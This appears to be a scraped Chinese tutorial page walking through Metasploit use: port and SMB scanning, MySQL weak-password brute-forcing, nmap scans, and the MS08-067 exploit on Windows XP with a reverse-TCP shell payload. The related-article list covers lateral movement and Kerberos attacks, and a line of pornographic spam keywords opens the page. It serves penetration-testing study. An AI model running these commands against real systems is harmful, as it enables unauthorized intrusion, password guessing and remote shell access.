国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

內(nèi)網(wǎng)安全:Msfconsole攻擊技術(shù)(成功拿下服務器最高權(quán)限.)

這篇具有很好參考價值的文章主要介紹了內(nèi)網(wǎng)安全:Msfconsole攻擊技術(shù)(成功拿下服務器最高權(quán)限.)。希望對大家有所幫助。如果存在錯誤或未考慮完全的地方,請大家不吝賜教,您也可以點擊"舉報違法"按鈕提交疑問。

Msfconsole工具?概括:

Msfconsole簡稱(msf)是一款常用的滲透測試工具,包含了常見的漏洞利用模塊和生成各種木馬,方便于安全測試人員的使用.

目錄:

?????????????????Msfconsole的使用:

? ? ? ? 第一步:進行端口掃描.

? ? ? ? 第二步:進行服務的掃描.

? ? ? ? 第三步:掃描3306(Mysql)端口的弱口令

? ? ? ? 第四步:在msf模塊里也可以使用nmap進行掃描.

? ? ? ? 第五步:掃描了服務器是用Win XP,然后對服務器進行滲透測試.

? ? ? ? ?滲透測試失敗的原因:


免責聲明:

嚴禁利用本文章中所提到的虛擬機和技術(shù)進行非法攻擊,否則后果自負,上傳者不承擔任何責任。


Msfconsole的使用:

打開Msfconsole工具:

msfconsole

msfconsole,滲透測試 領(lǐng)域.,# 安全測試工具領(lǐng)域.,# 權(quán)限提升 || 維持 領(lǐng)域.,系統(tǒng)安全,web安全,安全架構(gòu),安全


第一步:進行端口掃描.

(1)查看端口掃描的模塊:

search portscan

msfconsole,滲透測試 領(lǐng)域.,# 安全測試工具領(lǐng)域.,# 權(quán)限提升 || 維持 領(lǐng)域.,系統(tǒng)安全,web安全,安全架構(gòu),安全

(2)使用端口掃描模塊:

use auxiliary/scanner/portscan/tcp

msfconsole,滲透測試 領(lǐng)域.,# 安全測試工具領(lǐng)域.,# 權(quán)限提升 || 維持 領(lǐng)域.,系統(tǒng)安全,web安全,安全架構(gòu),安全

(3)查看模塊信息(模塊里的yes都要填):

show options

msfconsole,滲透測試 領(lǐng)域.,# 安全測試工具領(lǐng)域.,# 權(quán)限提升 || 維持 領(lǐng)域.,系統(tǒng)安全,web安全,安全架構(gòu),安全

(4)設(shè)置目標IP進行掃描:

set rhosts (目標IP地址)

msfconsole,滲透測試 領(lǐng)域.,# 安全測試工具領(lǐng)域.,# 權(quán)限提升 || 維持 領(lǐng)域.,系統(tǒng)安全,web安全,安全架構(gòu),安全

(5)設(shè)置線程為100:

set threads 100

msfconsole,滲透測試 領(lǐng)域.,# 安全測試工具領(lǐng)域.,# 權(quán)限提升 || 維持 領(lǐng)域.,系統(tǒng)安全,web安全,安全架構(gòu),安全

(6)使用(執(zhí)行):run 或者 exploit

run

msfconsole,滲透測試 領(lǐng)域.,# 安全測試工具領(lǐng)域.,# 權(quán)限提升 || 維持 領(lǐng)域.,系統(tǒng)安全,web安全,安全架構(gòu),安全

(7)退出到msf :

back

msfconsole,滲透測試 領(lǐng)域.,# 安全測試工具領(lǐng)域.,# 權(quán)限提升 || 維持 領(lǐng)域.,系統(tǒng)安全,web安全,安全架構(gòu),安全


第二步:進行服務的掃描.

(1)查看smb_version服務模塊:

search smb_version

msfconsole,滲透測試 領(lǐng)域.,# 安全測試工具領(lǐng)域.,# 權(quán)限提升 || 維持 領(lǐng)域.,系統(tǒng)安全,web安全,安全架構(gòu),安全

(2)使用服務模塊:

use auxiliary/scanner/smb/smb_version 

msfconsole,滲透測試 領(lǐng)域.,# 安全測試工具領(lǐng)域.,# 權(quán)限提升 || 維持 領(lǐng)域.,系統(tǒng)安全,web安全,安全架構(gòu),安全

(3)查看模塊信息(模塊里的yes都要填):

show options

msfconsole,滲透測試 領(lǐng)域.,# 安全測試工具領(lǐng)域.,# 權(quán)限提升 || 維持 領(lǐng)域.,系統(tǒng)安全,web安全,安全架構(gòu),安全

(4)設(shè)置目標IP進行掃描:

set rhosts (目標IP地址)

msfconsole,滲透測試 領(lǐng)域.,# 安全測試工具領(lǐng)域.,# 權(quán)限提升 || 維持 領(lǐng)域.,系統(tǒng)安全,web安全,安全架構(gòu),安全

(5)設(shè)置線程為10:

set threads 10

msfconsole,滲透測試 領(lǐng)域.,# 安全測試工具領(lǐng)域.,# 權(quán)限提升 || 維持 領(lǐng)域.,系統(tǒng)安全,web安全,安全架構(gòu),安全

(6)使用(執(zhí)行):run或者exploit

run

msfconsole,滲透測試 領(lǐng)域.,# 安全測試工具領(lǐng)域.,# 權(quán)限提升 || 維持 領(lǐng)域.,系統(tǒng)安全,web安全,安全架構(gòu),安全

(7)退出到msf :

back

msfconsole,滲透測試 領(lǐng)域.,# 安全測試工具領(lǐng)域.,# 權(quán)限提升 || 維持 領(lǐng)域.,系統(tǒng)安全,web安全,安全架構(gòu),安全


第三步:掃描3306(Mysql)端口的弱口令

(1)查看掃描3306(Mysql)端口的弱口令模板信息:

search mysql_login

msfconsole,滲透測試 領(lǐng)域.,# 安全測試工具領(lǐng)域.,# 權(quán)限提升 || 維持 領(lǐng)域.,系統(tǒng)安全,web安全,安全架構(gòu),安全

(2)使用掃描3306(Mysql)端口的弱口令模塊:

use auxiliary/scanner/mysql/mysql_login

msfconsole,滲透測試 領(lǐng)域.,# 安全測試工具領(lǐng)域.,# 權(quán)限提升 || 維持 領(lǐng)域.,系統(tǒng)安全,web安全,安全架構(gòu),安全

(3)查看模塊信息(模塊里的yes都要填):

show options

msfconsole,滲透測試 領(lǐng)域.,# 安全測試工具領(lǐng)域.,# 權(quán)限提升 || 維持 領(lǐng)域.,系統(tǒng)安全,web安全,安全架構(gòu),安全

(4)設(shè)置目標IP進行掃描:

set rhosts (目標IP地址)

msfconsole,滲透測試 領(lǐng)域.,# 安全測試工具領(lǐng)域.,# 權(quán)限提升 || 維持 領(lǐng)域.,系統(tǒng)安全,web安全,安全架構(gòu),安全

(5)設(shè)置線程為10:

set threads 10

msfconsole,滲透測試 領(lǐng)域.,# 安全測試工具領(lǐng)域.,# 權(quán)限提升 || 維持 領(lǐng)域.,系統(tǒng)安全,web安全,安全架構(gòu),安全

(6)使用(執(zhí)行):run或者exploit

run

msfconsole,滲透測試 領(lǐng)域.,# 安全測試工具領(lǐng)域.,# 權(quán)限提升 || 維持 領(lǐng)域.,系統(tǒng)安全,web安全,安全架構(gòu),安全

(7)退出到msf :

back

msfconsole,滲透測試 領(lǐng)域.,# 安全測試工具領(lǐng)域.,# 權(quán)限提升 || 維持 領(lǐng)域.,系統(tǒng)安全,web安全,安全架構(gòu),安全


第四步:在msf模塊里也可以使用nmap進行掃描.

(1)主機發(fā)現(xiàn):

nmap -sn 地址/24

msfconsole,滲透測試 領(lǐng)域.,# 安全測試工具領(lǐng)域.,# 權(quán)限提升 || 維持 領(lǐng)域.,系統(tǒng)安全,web安全,安全架構(gòu),安全

(2)端口掃描:

nmap -sS 地址

msfconsole,滲透測試 領(lǐng)域.,# 安全測試工具領(lǐng)域.,# 權(quán)限提升 || 維持 領(lǐng)域.,系統(tǒng)安全,web安全,安全架構(gòu),安全

(3)系統(tǒng)掃描:

nmap -O 地址

msfconsole,滲透測試 領(lǐng)域.,# 安全測試工具領(lǐng)域.,# 權(quán)限提升 || 維持 領(lǐng)域.,系統(tǒng)安全,web安全,安全架構(gòu),安全

(4)版本掃描:

nmap -sV 地址

msfconsole,滲透測試 領(lǐng)域.,# 安全測試工具領(lǐng)域.,# 權(quán)限提升 || 維持 領(lǐng)域.,系統(tǒng)安全,web安全,安全架構(gòu),安全

(5)綜合掃描:

nmap -A 地址

msfconsole,滲透測試 領(lǐng)域.,# 安全測試工具領(lǐng)域.,# 權(quán)限提升 || 維持 領(lǐng)域.,系統(tǒng)安全,web安全,安全架構(gòu),安全


第五步:掃描了服務器是用Win XP,然后對服務器進行滲透測試.

(1)啟動 postgresql 數(shù)據(jù)庫:

systemctl start postgresql.service

msfconsole,滲透測試 領(lǐng)域.,# 安全測試工具領(lǐng)域.,# 權(quán)限提升 || 維持 領(lǐng)域.,系統(tǒng)安全,web安全,安全架構(gòu),安全


(2)設(shè)置為開機自啟:

systemctl enable postgresql

msfconsole,滲透測試 領(lǐng)域.,# 安全測試工具領(lǐng)域.,# 權(quán)限提升 || 維持 領(lǐng)域.,系統(tǒng)安全,web安全,安全架構(gòu),安全


(3)啟動 Metasploit

msfconsole

msfconsole,滲透測試 領(lǐng)域.,# 安全測試工具領(lǐng)域.,# 權(quán)限提升 || 維持 領(lǐng)域.,系統(tǒng)安全,web安全,安全架構(gòu),安全


(4)搜索Win XP漏洞對應的模塊.

search ms08_067

msfconsole,滲透測試 領(lǐng)域.,# 安全測試工具領(lǐng)域.,# 權(quán)限提升 || 維持 領(lǐng)域.,系統(tǒng)安全,web安全,安全架構(gòu),安全


(5)使用Win XP漏洞掃描模塊.

use exploit/windows/smb/ms08_067_netapi

msfconsole,滲透測試 領(lǐng)域.,# 安全測試工具領(lǐng)域.,# 權(quán)限提升 || 維持 領(lǐng)域.,系統(tǒng)安全,web安全,安全架構(gòu),安全


(6)設(shè)置攻擊載荷

set payload generic/shell_reverse_tcp

msfconsole,滲透測試 領(lǐng)域.,# 安全測試工具領(lǐng)域.,# 權(quán)限提升 || 維持 領(lǐng)域.,系統(tǒng)安全,web安全,安全架構(gòu),安全


(7)查看模塊信息(模塊里的yes都要填).

show options

msfconsole,滲透測試 領(lǐng)域.,# 安全測試工具領(lǐng)域.,# 權(quán)限提升 || 維持 領(lǐng)域.,系統(tǒng)安全,web安全,安全架構(gòu),安全


(8)查看滲透攻擊模塊的攻擊平臺,找到操作系統(tǒng)平臺版本

show targets 

msfconsole,滲透測試 領(lǐng)域.,# 安全測試工具領(lǐng)域.,# 權(quán)限提升 || 維持 領(lǐng)域.,系統(tǒng)安全,web安全,安全架構(gòu),安全


(9)設(shè)置操作系統(tǒng)(target).

set target 34

msfconsole,滲透測試 領(lǐng)域.,# 安全測試工具領(lǐng)域.,# 權(quán)限提升 || 維持 領(lǐng)域.,系統(tǒng)安全,web安全,安全架構(gòu),安全


(10)設(shè)置目標IP.

set rhosts (目標IP地址)

msfconsole,滲透測試 領(lǐng)域.,# 安全測試工具領(lǐng)域.,# 權(quán)限提升 || 維持 領(lǐng)域.,系統(tǒng)安全,web安全,安全架構(gòu),安全


(11)設(shè)置本地IP

set LHOST 本地IP

msfconsole,滲透測試 領(lǐng)域.,# 安全測試工具領(lǐng)域.,# 權(quán)限提升 || 維持 領(lǐng)域.,系統(tǒng)安全,web安全,安全架構(gòu),安全


(12)設(shè)置端口:

set LPORT 4444

msfconsole,滲透測試 領(lǐng)域.,# 安全測試工具領(lǐng)域.,# 權(quán)限提升 || 維持 領(lǐng)域.,系統(tǒng)安全,web安全,安全架構(gòu),安全


(13)使用(執(zhí)行):run或者exploit

msfconsole,滲透測試 領(lǐng)域.,# 安全測試工具領(lǐng)域.,# 權(quán)限提升 || 維持 領(lǐng)域.,系統(tǒng)安全,web安全,安全架構(gòu),安全


(14)滲透測試成功.?


滲透測試失敗的原因:

(1)靶機開啟了防火墻.

(2)兩臺主機不能互聯(lián).(用 ping IP地址)

? ? ?


參考鏈接:使用MSF 利用 ms08_067 對 XP 進行滲透_豐梓林的博客-CSDN博客文章來源地址http://www.zghlxwxcb.cn/news/detail-601667.html

到了這里,關(guān)于內(nèi)網(wǎng)安全:Msfconsole攻擊技術(shù)(成功拿下服務器最高權(quán)限.)的文章就介紹完了。如果您還想了解更多內(nèi)容,請在右上角搜索TOY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來自互聯(lián)網(wǎng)用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務,不擁有所有權(quán),不承擔相關(guān)法律責任。如若轉(zhuǎn)載,請注明出處: 如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實不符,請點擊違法舉報進行投訴反饋,一經(jīng)查實,立即刪除!

領(lǐng)支付寶紅包贊助服務器費用

相關(guān)文章

  • 內(nèi)網(wǎng)安全 信息收集(收集內(nèi)網(wǎng)計算機的所有信息 進行攻擊.)

    內(nèi)網(wǎng)安全 信息收集(收集內(nèi)網(wǎng)計算機的所有信息 進行攻擊.)

    在 ? 滲透測試人員 進入一個內(nèi) 網(wǎng)后,面對的是一片 “ 未知的區(qū)域 ”,所以 滲透測試人員首先會對當前所 處的網(wǎng)絡環(huán)境進行判斷,通常的判斷分為三種. (1) 我是誰? —— 對計算機的角色進行判斷. (2)我在哪? —— 對目前機器所處位置區(qū)域的判斷。 (3)這是哪?

    2024年02月02日
    瀏覽(26)
  • 內(nèi)網(wǎng)安全--AS-REP Roasting攻擊

    內(nèi)網(wǎng)安全--AS-REP Roasting攻擊

    AS-REP Roasting是一種對用戶賬號進行離線爆破的攻擊方式。但是該攻擊方式利用比較局限,因為其需要用戶賬戶設(shè)置“不要求Kerberos預身份驗證”選項,而該選項是默認沒有勾選上的。Kerberos預身份驗證發(fā)送在Kerberos身份驗證的第一階段(AS_REQAS-REP),它的主要作用是防止密碼離線

    2024年04月14日
    瀏覽(27)
  • 內(nèi)網(wǎng)安全:橫向傳遞攻擊( RDP || Cobalt Strike )

    內(nèi)網(wǎng)安全:橫向傳遞攻擊( RDP || Cobalt Strike )

    橫向移動就是在拿下對方一臺主機后,以拿下的那臺主機作為跳板,對內(nèi)網(wǎng)的其他主機再進行后面滲透,利用既有的資源嘗試獲取更多的憑據(jù)、更高的權(quán)限,一步一步拿下更多的主機,進而達到控制整個內(nèi)網(wǎng)、獲取到最高權(quán)限、發(fā)動高級持續(xù)性威脅攻擊的目的.( 傳遞攻擊主

    2024年02月10日
    瀏覽(27)
  • 內(nèi)網(wǎng)安全:橫向傳遞攻擊(SMB || WMI 明文或 hash 傳遞)

    內(nèi)網(wǎng)安全:橫向傳遞攻擊(SMB || WMI 明文或 hash 傳遞)

    橫向移動就是在拿下對方一臺主機后,以拿下的那臺主機作為跳板,對內(nèi)網(wǎng)的其他主機再進行后面滲透,利用既有的資源嘗試獲取更多的憑據(jù)、更高的權(quán)限,一步一步拿下更多的主機,進而達到控制整個內(nèi)網(wǎng)、獲取到最高權(quán)限、發(fā)動高級持續(xù)性威脅攻擊的目的.( 傳遞攻擊主

    2024年02月08日
    瀏覽(19)
  • 8、內(nèi)網(wǎng)安全-橫向移動&RDP&Kerberos攻擊&SPN掃描&WinRM&WinRS

    8、內(nèi)網(wǎng)安全-橫向移動&RDP&Kerberos攻擊&SPN掃描&WinRM&WinRS

    用途:個人學習筆記,有所借鑒,歡迎指正 目錄 一、域橫向移動-RDP-明文NTLM 1.探針服務: 2.探針連接: 3.連接執(zhí)行: 二、域橫向移動-WinRMWinRS-明文NTLM 1.探針可用: 2.連接執(zhí)行: 3.上線 CSMSF: 4.CS 內(nèi)置橫向移動 三、域橫向移動-SpnKerberos-請求破解重寫 Kerberoasting攻擊的利用:

    2024年02月19日
    瀏覽(24)
  • 軟件測試崗,4 輪面試成功拿下字節(jié) Offer..........

    軟件測試崗,4 輪面試成功拿下字節(jié) Offer..........

    一共經(jīng)歷了四輪面試:技術(shù)4面+HR面。 特整理出所涉及的全部知識點,并復盤了完整面試題及答案,分享給大家,希望能夠幫到一些計劃面試字節(jié)的朋友。 怎么編寫案例? 軟件測試的兩種方法 測試結(jié)束的標準是什么? 軟件的生命周期 什么是軟件的生命周期? 軟件測試按過程分

    2024年02月03日
    瀏覽(96)
  • 網(wǎng)絡攻防技術(shù)——緩沖區(qū)溢出攻擊(基于服務器)

    網(wǎng)絡攻防技術(shù)——緩沖區(qū)溢出攻擊(基于服務器)

    ? ? ? 緩沖區(qū)溢出 被定義為程序試圖將數(shù)據(jù)寫入緩沖區(qū)邊界之外的情況。惡意用戶可以利用此漏洞更改程序的流控制,從而導致惡意代碼的執(zhí)行。本實驗的目的是讓學生對這種類型的漏洞有實際的了解,并學習如何利用攻擊中的漏洞。 ? ? ?在這個實驗中,學生將得到四個不

    2024年02月02日
    瀏覽(33)
  • 服務器安全性漏洞和常見攻擊方式解析

    服務器安全性是當今互聯(lián)網(wǎng)信息安全的重要組成部分。在網(wǎng)絡安全領(lǐng)域中,常見的威脅之-就是服務器安全性漏洞。本文將深入探討服務器安全性漏洞的本質(zhì),并分析常見的攻擊方式并提供一些建議以加強服務器的安全性。 一、服務器安全性漏洞的本質(zhì) 服務器安全性漏洞指的

    2024年01月17日
    瀏覽(22)
  • 內(nèi)網(wǎng)安全:隧道技術(shù)詳解

    內(nèi)網(wǎng)安全:隧道技術(shù)詳解

    目錄 隧道技術(shù) 反向連接技術(shù) 反向連接實驗所用網(wǎng)絡拓撲圖及說明 網(wǎng)絡說明 防火墻限制說明 實驗前提說明 實戰(zhàn)一:CS反向連接上線 - 拿下Win2008 一. 使用轉(zhuǎn)發(fā)代理上線創(chuàng)建監(jiān)聽器 二. 上傳后門執(zhí)行上線 隧道技術(shù) - SMB協(xié)議 SMB協(xié)議介紹 實戰(zhàn)二:SMB協(xié)議搭建隧道 正向連接 - 拿下

    2024年02月08日
    瀏覽(19)
  • 內(nèi)網(wǎng)安全:代理技術(shù)詳解

    內(nèi)網(wǎng)安全:代理技術(shù)詳解

    目錄 代理技術(shù)實驗所用網(wǎng)絡拓撲圖及說明 代理技術(shù) SOCK協(xié)議 使用代理技術(shù)的原因 正向代理與反向代理 實戰(zhàn)一:MSF代理通訊 實驗原理說明 一. Meterpreter建立路由 二. MSF建立節(jié)點 三. 建立代理到MSF上 實戰(zhàn)二:CS代理通訊 實驗原理說明 一. CS建立SOCKS代理 二. 使用proxifier 設(shè)置代理

    2024年02月07日
    瀏覽(30)

覺得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請作者喝杯咖啡吧~博客贊助

支付寶掃一掃領(lǐng)取紅包,優(yōu)惠每天領(lǐng)

二維碼1

領(lǐng)取紅包

二維碼2

領(lǐng)紅包